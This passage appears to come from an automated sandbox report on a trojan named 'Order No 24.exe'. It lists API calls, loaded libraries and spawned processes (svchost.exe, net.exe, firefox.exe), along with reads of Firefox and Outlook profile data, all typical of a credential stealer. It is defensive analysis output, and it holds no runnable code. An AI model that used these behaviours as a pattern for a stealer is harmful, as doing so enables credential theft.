                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F53090 NtSetValueKey
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F53010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F53D70 NtOpenThread
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F53D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_003B9310 NtCreateFile
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_003B9480 NtReadFile
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_003B9580 NtDeleteFile
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_003B9620 NtClose
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_003B9780 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009C6685: CreateFileW,DeviceIoControl,CloseHandle
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009BACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009C79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FA02C04_2_02FA02C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FC02744_2_02FC0274
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F2E3F04_2_02F2E3F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FE03E64_2_02FE03E6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDA3524_2_02FDA352
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FB20004_2_02FB2000
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD81CC4_2_02FD81CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FE01AA4_2_02FE01AA
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD41A24_2_02FD41A2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FA81584_2_02FA8158
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FBA1184_2_02FBA118
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F101004_2_02F10100
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F3C6E04_2_02F3C6E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F1C7C04_2_02F1C7C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F207704_2_02F20770
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F447504_2_02F44750
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FCE4F64_2_02FCE4F6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD24464_2_02FD2446
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FC44204_2_02FC4420
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FE05914_2_02FE0591
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F205354_2_02F20535
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F1EA804_2_02F1EA80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD6BD74_2_02FD6BD7
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDAB404_2_02FDAB40
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F4E8F04_2_02F4E8F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F068B84_2_02F068B8
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F228404_2_02F22840
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F2A8404_2_02F2A840
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F229A04_2_02F229A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FEA9A64_2_02FEA9A6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F369624_2_02F36962
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDEEDB4_2_02FDEEDB
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F32E904_2_02F32E90
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDCE934_2_02FDCE93
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F20E594_2_02F20E59
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDEE264_2_02FDEE26
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F2CFE04_2_02F2CFE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F12FC84_2_02F12FC8
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F9EFA04_2_02F9EFA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F94F404_2_02F94F40
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F40F304_2_02F40F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FC2F304_2_02FC2F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F62F284_2_02F62F28
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F10CF24_2_02F10CF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FC0CB54_2_02FC0CB5
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F20C004_2_02F20C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F1ADE04_2_02F1ADE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F38DBF4_2_02F38DBF
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FBCD1F4_2_02FBCD1F
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F2AD004_2_02F2AD00
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FC12ED4_2_02FC12ED
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F3B2C04_2_02F3B2C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F252A04_2_02F252A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F6739A4_2_02F6739A
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F0D34C4_2_02F0D34C
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD132D4_2_02FD132D
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD70E94_2_02FD70E9
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDF0E04_2_02FDF0E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FCF0CC4_2_02FCF0CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F270C04_2_02F270C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F2B1B04_2_02F2B1B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F0F1724_2_02F0F172
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FEB16B4_2_02FEB16B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F5516C4_2_02F5516C
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD16CC4_2_02FD16CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDF7B04_2_02FDF7B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F114604_2_02F11460
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDF43F4_2_02FDF43F
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FBD5B04_2_02FBD5B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD75714_2_02FD7571
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FCDAC64_2_02FCDAC6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F65AA04_2_02F65AA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FBDAAC4_2_02FBDAAC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FC1AA34_2_02FC1AA3
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F93A6C4_2_02F93A6C
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDFA494_2_02FDFA49
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD7A464_2_02FD7A46
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F95BF04_2_02F95BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F5DBF94_2_02F5DBF9
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F3FB804_2_02F3FB80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDFB764_2_02FDFB76
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F238E04_2_02F238E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F8D8004_2_02F8D800
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F299504_2_02F29950
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F3B9504_2_02F3B950
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FB59104_2_02FB5910
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F29EB04_2_02F29EB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDFFB14_2_02FDFFB1
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F21F924_2_02F21F92
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDFF094_2_02FDFF09
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FDFCF24_2_02FDFCF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F99C324_2_02F99C32
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F3FDC04_2_02F3FDC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD7D734_2_02FD7D73
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02FD1D5A4_2_02FD1D5A
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F23D404_2_02F23D40
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003A1F804_2_003A1F80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0039CEA04_2_0039CEA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0039D0C04_2_0039D0C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0039B1404_2_0039B140
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003A55E04_2_003A55E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003A38204_2_003A3820
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003A381B4_2_003A381B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003BBC204_2_003BBC20
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C852244_2_02C85224
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C7E3044_2_02C7E304
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C7E1E44_2_02C7E1E4
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C7D7684_2_02C7D768
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02C7E46C4_2_02C7E46C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 102 times
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: String function: 009AF8A0 appears 35 times
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: String function: 0099EC2F appears 68 times
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: String function: 009A6AC0 appears 42 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02F55130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02F0B970 appears 280 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02F8EA12 appears 86 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02F67E54 appears 102 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 02F9F290 appears 105 times
                Source: Order No 24.exe, 00000000.00000003.2138051965.0000000003B9D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Order No 24.exe
                Source: Order No 24.exe, 00000000.00000003.2135410493.00000000039F3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Order No 24.exe
                Source: Order No 24.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@16/9
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009CCE7A GetLastError,FormatMessageW,0_2_009CCE7A
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009BAB84 AdjustTokenPrivileges,CloseHandle,0_2_009BAB84
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009BB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_009BB134
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009CE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_009CE1FD
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_009C6532
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009DC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_009DC18C
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_0098406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0098406B
                Source: C:\Users\user\Desktop\Order No 24.exeFile created: C:\Users\user\AppData\Local\Temp\autC4A8.tmpJump to behavior
                Source: Order No 24.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Order No 24.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: net.exe, 00000004.00000002.4576398296.00000000029DC000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2495423301.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4576398296.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4576398296.00000000029D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Order No 24.exeReversingLabs: Detection: 34%
                Source: unknownProcess created: C:\Users\user\Desktop\Order No 24.exe "C:\Users\user\Desktop\Order No 24.exe"
                Source: C:\Users\user\Desktop\Order No 24.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Order No 24.exe"
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Order No 24.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Order No 24.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\Order No 24.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\Order No 24.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\Order No 24.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\Order No 24.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\Order No 24.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\Order No 24.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Order No 24.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Order No 24.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Order No 24.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Order No 24.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Order No 24.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\net.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\net.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Order No 24.exe | Static file information: File size 1218048 > 1048576
                Source: Order No 24.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Order No 24.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Order No 24.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Order No 24.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Order No 24.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Order No 24.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Order No 24.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.2268680902.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2268784841.000000000083B000.00000004.00000020.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000002.4576582930.0000000000E58000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vqiDHNHvZuv.exe, 00000003.00000000.2190711391.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4576813275.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: Order No 24.exe, 00000000.00000003.2139513122.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Order No 24.exe, 00000000.00000003.2129931817.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2301205113.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2176578979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2301205113.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2174584549.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2301147253.0000000002B8D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.000000000307E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2308281410.0000000002D3A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Order No 24.exe, 00000000.00000003.2139513122.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Order No 24.exe, 00000000.00000003.2129931817.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2301205113.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2176578979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2301205113.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2174584549.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, net.exe, 00000004.00000003.2301147253.0000000002B8D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.000000000307E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2308281410.0000000002D3A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 00000004.00000002.4576398296.0000000002952000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578877580.000000000350C000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000000.2377314879.0000000002D2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2604417114.000000002CC4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 00000004.00000002.4576398296.0000000002952000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578877580.000000000350C000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000000.2377314879.0000000002D2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2604417114.000000002CC4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.2268680902.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2268784841.000000000083B000.00000004.00000020.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000002.4576582930.0000000000E58000.00000004.00000020.00020000.00000000.sdmp
                Source: Order No 24.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Order No 24.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Order No 24.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Order No 24.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Order No 24.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_0099E01E LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009A6B05 push ecx; ret 0_2_009A6B18
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00491ACE push eax; iretd 2_2_00491B68
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004961DF push FFFFFF9Bh; retf 2_2_004961E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0049AA1D push edi; retf 2_2_0049AA23
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00491B40 push eax; iretd 2_2_00491B68
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004A933F push ss; ret 2_2_004A9355
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00495BF7 push FFFFFFE2h; iretd 2_2_00495BFD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00494BB6 push ds; iretd 2_2_00494BB8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00493420 push eax; ret 2_2_00493422
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004A3CE3 push es; retf 2_2_004A3D12
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004A8F53 push esp; ret 2_2_004A9157
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0049AF60 push 0000007Bh; iretd 2_2_0049AF62
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx 2_2_030309B6
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_02F109AD push ecx; mov dword ptr [esp], ecx 4_2_02F109B6
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_003927D4 push FFFFFFE2h; iretd 4_2_003927DA
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_003A08C0 push es; retf 4_2_003A08EF
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_00392DBC push FFFFFF9Bh; retf 4_2_00392DBE
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_003B0E6A push esp; retf 4_2_003B0E6B
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_003975FA push edi; retf 4_2_00397600
                Source: C:\Windows\SysWOW64\net.exe | Code function: 4_2_00391793 push ds; iretd 4_2_00391795
